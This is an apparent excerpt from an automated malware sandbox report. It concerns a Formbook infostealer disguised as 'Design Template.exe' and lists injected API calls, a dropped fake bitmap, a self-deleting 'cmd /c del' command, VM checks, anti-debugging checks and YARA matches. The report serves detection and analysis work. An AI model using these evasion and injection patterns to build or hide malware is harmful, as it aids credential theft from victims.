Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_044C9910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C99A0 NtCreateSection,LdrInitializeThunk, 14_2_044C99A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A50 NtCreateFile,LdrInitializeThunk, 14_2_044C9A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9560 NtWriteFile, 14_2_044C9560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9520 NtWaitForSingleObject, 14_2_044C9520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CAD30 NtSetContextThread, 14_2_044CAD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C95F0 NtQueryInformationFile, 14_2_044C95F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9670 NtQueryInformationProcess, 14_2_044C9670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9610 NtEnumerateValueKey, 14_2_044C9610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9760 NtOpenProcess, 14_2_044C9760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CA770 NtOpenThread, 14_2_044CA770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9770 NtSetInformationFile, 14_2_044C9770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CA710 NtOpenProcessToken, 14_2_044CA710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9730 NtQueryVirtualMemory, 14_2_044C9730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C97A0 NtUnmapViewOfSection, 14_2_044C97A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CB040 NtSuspendThread, 14_2_044CB040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9820 NtEnumerateKey, 14_2_044C9820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C98F0 NtReadVirtualMemory, 14_2_044C98F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C98A0 NtWriteVirtualMemory, 14_2_044C98A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9950 NtQueueApcThread, 14_2_044C9950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C99D0 NtCreateProcessEx, 14_2_044C99D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A00 NtProtectVirtualMemory, 14_2_044C9A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A10 NtQuerySection, 14_2_044C9A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A20 NtResumeThread, 14_2_044C9A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A80 NtOpenDirectoryObject, 14_2_044C9A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9B00 NtSetValueKey, 14_2_044C9B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CA3B0 NtGetContextThread, 14_2_044CA3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005081B0 NtCreateFile, 14_2_005081B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00508260 NtReadFile, 14_2_00508260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005082E0 NtClose, 14_2_005082E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00508390 NtAllocateVirtualMemory, 14_2_00508390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005081AA NtCreateFile, 14_2_005081AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050825B NtReadFile, 14_2_0050825B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005082DA NtClose, 14_2_005082DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050838A NtAllocateVirtualMemory, 14_2_0050838A
Detected potential crypto function
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434798 2_2_00434798
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042C063 2_2_0042C063
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042572C 2_2_0042572C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00429FD0 2_2_00429FD0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD20A8 4_2_00AD20A8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B090 4_2_00A1B090
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD28EC 4_2_00AD28EC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1002 4_2_00AC1002
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0F900 4_2_00A0F900
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD22AE 4_2_00AD22AE
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3EBB0 4_2_00A3EBB0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACDBD2 4_2_00ACDBD2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD2B28 4_2_00AD2B28
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1841F 4_2_00A1841F
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACD466 4_2_00ACD466
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32581 4_2_00A32581
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1D5E0 4_2_00A1D5E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD25DD 4_2_00AD25DD
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A00D20 4_2_00A00D20
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD2D07 4_2_00AD2D07
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD1D55 4_2_00AD1D55
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD2EF7 4_2_00AD2EF7
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A26E30 4_2_00A26E30
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACD616 4_2_00ACD616
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD1FF1 4_2_00AD1FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454D466 14_2_0454D466
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449841F 14_2_0449841F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04551D55 14_2_04551D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04552D07 14_2_04552D07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04480D20 14_2_04480D20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045525DD 14_2_045525DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449D5E0 14_2_0449D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454D616 14_2_0454D616
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A6E30 14_2_044A6E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04552EF7 14_2_04552EF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04551FF1 14_2_04551FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541002 14_2_04541002
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045528EC 14_2_045528EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B090 14_2_0449B090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045520A8 14_2_045520A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448F900 14_2_0448F900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045522AE 14_2_045522AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04552B28 14_2_04552B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454DBD2 14_2_0454DBD2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BEBB0 14_2_044BEBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050C838 14_2_0050C838
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F8C4B 14_2_004F8C4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F8C50 14_2_004F8C50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F2D90 14_2_004F2D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F2FB0 14_2_004F2FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Design Template.exe Code function: String function: 00422DE8 appears 49 times
Source: C:\Users\user\Desktop\Design Template.exe Code function: String function: 00A0B150 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0448B150 appears 35 times
PE file does not import any functions
Source: Liebert.bmp.2.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: Design Template.exe, 00000004.00000002.329749944.0000000002629000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Design Template.exe
Source: Design Template.exe, 00000004.00000002.329471350.0000000000C8F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Design Template.exe
Uses 32bit PE files
Source: Design Template.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Liebert.bmp.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Liebert.bmp.2.dr Static PE information: Section .text
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@7/1@15/6
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042D194 FindResourceA,LoadResource,LockResource, 2_2_0042D194
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01
Source: C:\Users\user\Desktop\Design Template.exe File created: C:\Users\user~1\AppData\Local\Temp\Liebert.bmp
Source: Design Template.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Design Template.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: Design Template.exe Virustotal: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\Design Template.exe 'C:\Users\user\Desktop\Design Template.exe'
Source: C:\Users\user\Desktop\Design Template.exe Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Design Template.exe Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
Source: Design Template.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Design Template.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00426369 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00426369
PE file contains sections with non-standard names
Source: Design Template.exe Static PE information: section name: .cdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00422C20 push eax; ret 2_2_00422C4E
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00422DE8 push eax; ret 2_2_00422E06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A5D0D1 push ecx; ret 4_2_00A5D0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044DD0D1 push ecx; ret 14_2_044DD0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F4984 push ebx; ret 14_2_004F4985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050B3F2 push eax; ret 14_2_0050B3F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050B3FB push eax; ret 14_2_0050B462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050B3A5 push eax; ret 14_2_0050B3F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050B45C push eax; ret 14_2_0050B462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050BCBE push ss; ret 14_2_0050BCC5
Source: initial sample Static PE information: section name: .text entropy: 7.31104749099

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Design Template.exe File created: C:\Users\user\AppData\Local\Temp\Liebert.bmp
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\Design Template.exe File created: C:\Users\user\AppData\Local\Temp\Liebert.bmp

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_004218A0 IsIconic, 2_2_004218A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00421A45 IsIconic,GetWindowPlacement,GetWindowRect, 2_2_00421A45
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00427F30 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA, 2_2_00427F30
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00427780 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC, 2_2_00427780
Source: C:\Users\user\Desktop\Design Template.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Design Template.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Design Template.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000004F85E4 second address: 00000000004F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000004F896E second address: 00000000004F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A36A60 rdtscp 4_2_00A36A60
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Design Template.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Liebert.bmp
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5548 Thread sleep time: -45000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000007.00000002.516979804.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.299098647.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Design Template.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Design Template.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A36A60 rdtscp 4_2_00A36A60
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_004383A8 LdrLoadDll, 2_2_004383A8
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00426369 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00426369
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043AA88 mov eax, dword ptr fs:[00000030h] 2_2_0043AA88
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A6E8 mov eax, dword ptr fs:[00000030h] 2_2_0043A6E8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A6F8 mov eax, dword ptr fs:[00000030h] 2_2_0043A6F8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00435F68 mov ecx, dword ptr fs:[00000030h] 2_2_00435F68
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A718 mov eax, dword ptr fs:[00000030h] 2_2_0043A718
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A7B8 mov eax, dword ptr fs:[00000030h] 2_2_0043A7B8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A490AF mov eax, dword ptr fs:[00000030h] 4_2_00A490AF
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3F0BF mov ecx, dword ptr fs:[00000030h] 4_2_00A3F0BF
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h] 4_2_00A3F0BF
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h] 4_2_00A3F0BF
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09080 mov eax, dword ptr fs:[00000030h] 4_2_00A09080
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h] 4_2_00A83884
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h] 4_2_00A83884
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A058EC mov eax, dword ptr fs:[00000030h] 4_2_00A058EC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h] 4_2_00A1B02A
